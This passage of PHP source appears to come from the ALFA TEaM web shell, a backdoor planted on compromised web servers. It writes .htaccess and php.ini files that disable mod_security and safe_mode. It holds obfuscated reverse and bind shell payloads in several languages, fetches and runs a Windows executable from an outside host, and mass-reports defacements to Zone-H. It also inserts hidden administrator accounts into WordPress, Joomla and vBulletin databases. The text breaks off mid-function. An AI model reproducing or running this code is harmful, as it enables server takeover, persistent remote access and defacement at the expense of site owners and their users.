3675@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
3676echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
3677}
3678if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
3679@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
3680echo '<center><b><big> php.ini created...!</center></b></big>';
3681}
3682if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
3683@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
3684echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
3685}
3686echo "<br></div>";
3687alfafooter();
3688}
3689function __get_resource($content){
3690return @gzinflate(__ZGVjb2Rlcg($content));
3691}
3692function __write_file($file, $content){
3693if($fh = @fopen($file, "wb")){
3694if(fwrite($fh, $content)!==false) return true;
3695}
3696return false;
3697}
3698function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
3699$res = "<font color='green'>[ Success...! ]</font>";
3700$err = "<font color='red'>[ Failed...! ]</font>";
3701if($evalOptions!="") $evalOptions = $evalOptions." ";
3702if($evalArguments!="") $evalArguments = " ".$evalArguments;
3703if($evalType=="c"){
3704$tmpdir = ALFA_TEMPDIR;
3705chdir($tmpdir);
3706if(is_writable($tmpdir)){
3707$uniq = substr(md5(time()),0,8);
3708$filename = $evalType.$uniq.".c";
3709$path = $filename;
3710if(__write_file($path, $evalCode)){
3711$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
3712$pathres = $filename.$ext;
3713$evalOptions = "-o ".$pathres." ".$evalOptions;
3714$cmd = "gcc ".$evalOptions.$path;
3715alfaEx($cmd);
3716if(is_file($pathres)){
3717if(chmod($pathres, 0755)){
3718$cmd = $pathres.$evalArguments;
3719alfaEx($cmd);
3720}else{$res = $err;}
3721unlink($pathres);
3722}else{$res = $err;}
3723unlink($path);
3724}else{$res = $err;}
3725}
3726return $res;
3727}elseif($evalType=="java"){
3728$tmpdir = ALFA_TEMPDIR;
3729chdir($tmpdir);
3730if(is_writable($tmpdir)){
3731if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
3732$classname = trim($r[1]);
3733$filename = $classname;
3734}else{
3735$uniq = substr(md5(time()),0,8);
3736$filename = $evalType.$uniq;
3737$evalCode = "class ".$filename." { ".$evalCode . " } ";
3738}
3739$path = $filename.".java";
3740if(__write_file($path, $evalCode)){
3741$cmd = "javac ".$evalOptions.$path;
3742alfaEx($cmd);
3743$pathres = $filename.".class";
3744if(is_file($pathres)){
3745if(chmod($pathres, 0755)){
3746$cmd = "java ".$filename.$evalArguments;
3747alfaEx($cmd);
3748}else{$res = $err;}
3749unlink($pathres);
3750}else{$res = $err;}
3751unlink($path);
3752}else{$res = $err;}
3753}
3754return $res;
3755}
3756return false;
3757}
3758function alfaconnect(){
3759alfahead();
3760$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
3761$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
3762$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
3763$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
3764$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
3765$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
3766$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
3767echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
3768echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
3769<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
3770$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
3771foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
3772echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
3773if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
3774$lang = $_POST['alfa1'];
3775$ip = $_POST['alfa2'];
3776$port = $_POST['alfa3'];
3777$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
3778$tmpdir = ALFA_TEMPDIR;
3779$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
3780$allow = array('perl','ruby','python','node');
3781eval('$lan=$'.$lang.';');
3782if(in_array($lang,$allow)){
3783if(__write_file($name,__get_resource($lan))){
3784if(_alfa_can_runCommand(true,true)){
3785$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
3786$out = alfaEx("$lang $name $arg $os");
3787if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
3788echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
3789}
3790}else{
3791echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
3792}
3793}
3794if($lang=='java'||$lang=='c'){
3795$code = __get_resource($lan);
3796$out = nl2br(bcinit($lang, $code,'',''));
3797echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
3798}
3799if($lang=='bcwin'){
3800$alfa = new AlfaCURL();
3801$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
3802$tmpdir = ALFA_TEMPDIR;
3803$f = @fopen($tmpdir.'/bcwin.exe','w+');
3804@fwrite($f, $s);
3805@fclose($f);
3806$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
3807}
3808if($lang=='php'){
3809echo "<pre class=ml1 style='margin-top:5px'>";
3810$code = __get_resource($lan);
3811if($code!==false){
3812$code = "\$target = \"".$arg."\";\n".$code;
3813eval($code);
3814echo("<center><font color='green'>[ Finished...! ]</font></center>");
3815}
3816echo "</pre>";
3817}
3818}
3819echo "</div>";
3820alfafooter();
3821}
3822function alfazoneh(){
3823alfahead();
3824echo '<div class=header>';
3825if(!function_exists('curl_version')){
3826echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
3827}
3828$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
3829$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
3830echo '
3831<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
3832<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
3833<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
3834<br>
3835<select id="text" name="hackmode" style="width:400px;">';
3836$x=1;
3837foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
3838echo '</select><br><select id="text" name="reason" style="width:200px;">';
3839$x=1;
3840foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
3841echo '</select><br>
3842<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
3843<p><input type="submit" value=" " name="go" /></p>
3844</form></center>';
3845if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
3846ob_start();
3847$hacker = $_POST['alfa1'];
3848$method = $_POST['alfa2'];
3849$neden = $_POST['alfa3'];
3850$site = $_POST['alfa4'];
3851if(empty($hacker)){
3852die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
3853}elseif($method == "------------------------------------SELECT-------------------------------------"){
3854die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
3855}elseif($neden == "------------------------------------SELECT-------------------------------------"){
3856die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
3857}elseif(empty($site)){
3858die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
3859}
3860$i = 0;
3861$sites = explode("\n", $site);
3862$alfa = new AlfaCURL();
3863while($i < count($sites)){
3864if(substr($sites[$i], 0, 4) != "http"){
3865$sites[$i] = "http://".$sites[$i];
3866}
3867$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
3868++$i;
3869}
3870echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
3871}
3872echo "</div>";
3873alfafooter();
3874}
3875function alfapwchanger(){
3876alfahead();
3877
3878echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
3879<center><h3>';
3880$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
3881Alfa_Create_A_Tag('pwchanger',$vals);
3882echo '</h3></center>';
3883if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
3884
3885echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
3886<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
3887$table = array('td1' =>
3888 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
3889 'td2' =>
3890 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
3891 'td3' =>
3892 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
3893 'td4' =>
3894 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
3895 'td5' =>
3896 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
3897 'td6' =>
3898 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
3899 'td7' =>
3900 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
3901 'td8' =>
3902 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
3903);
3904create_table($table);
3905echo '<p><input value=" " name="send" type="submit"></p></form>';
3906if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
3907$localhost = $_POST['alfa3'];
3908$database = $_POST['alfa4'];
3909$username = $_POST['alfa5'];
3910$password = $_POST['alfa6'];
3911$admin = $_POST['alfa8'];
3912$SQL = $_POST['alfa9'];
3913$prefix = $_POST['alfa10'];
3914$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
3915$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
3916$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
3917$sole = @mysqli_num_rows($solevisible);
3918if ($sole == 1){
3919$solevis = @mysqli_fetch_assoc($solevisible);
3920$res = $solevis['ID'];
3921}
3922$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
3923if($solevisible){
3924__alert('Success... '.$admin.' is created...');}
3925}
3926}
3927if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
3928
3929echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
3930$table = array('td1' =>
3931 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
3932 'td2' =>
3933 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
3934 'td3' =>
3935 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
3936 'td4' =>
3937 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
3938 'td5' =>
3939 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
3940 'td6' =>
3941 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
3942 'td7' =>
3943 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
3944 'td8' =>
3945 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
3946);
3947create_table($table);
3948echo '<p><input value=" " name="send" type="submit"></p></form></center>';
3949if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
3950$localhost = $_POST['alfa3'];
3951$database = $_POST['alfa4'];
3952$username = $_POST['alfa5'];
3953$password = $_POST['alfa6'];
3954$admin = $_POST['alfa8'];
3955$SQL = $_POST['alfa9'];
3956$prefix = $_POST['alfa10'];
3957$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
3958$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
3959$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
3960$sole =@mysqli_num_rows($solevisible);
3961if ($sole == 1){
3962$solevis =@mysqli_fetch_assoc($solevisible);
3963$res = $solevis['id'];
3964}
3965$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
3966if($solevisible){
3967__alert('Success... '.$admin.' is created...');}
3968}
3969}
3970if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
3971
3972echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
3973$table = array('td1' =>
3974 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
3975 'td2' =>
3976 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
3977 'td3' =>
3978 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
3979 'td4' =>
3980 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
3981 'td5' =>
3982 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
3983 'td6' =>
3984 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
3985 'td7' =>
3986 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
3987 'td8' =>
3988 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
3989);
3990create_table($table);
3991echo '<p><input value=" " name="send" type="submit"></p></form></center>';
3992if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
3993$localhost = $_POST['alfa2'];
3994$database = $_POST['alfa3'];
3995$username = $_POST['alfa5'];
3996$password = $_POST['alfa6'];
3997$prefix = $_POST['alfa7'];
3998$admin = $_POST['alfa8'];
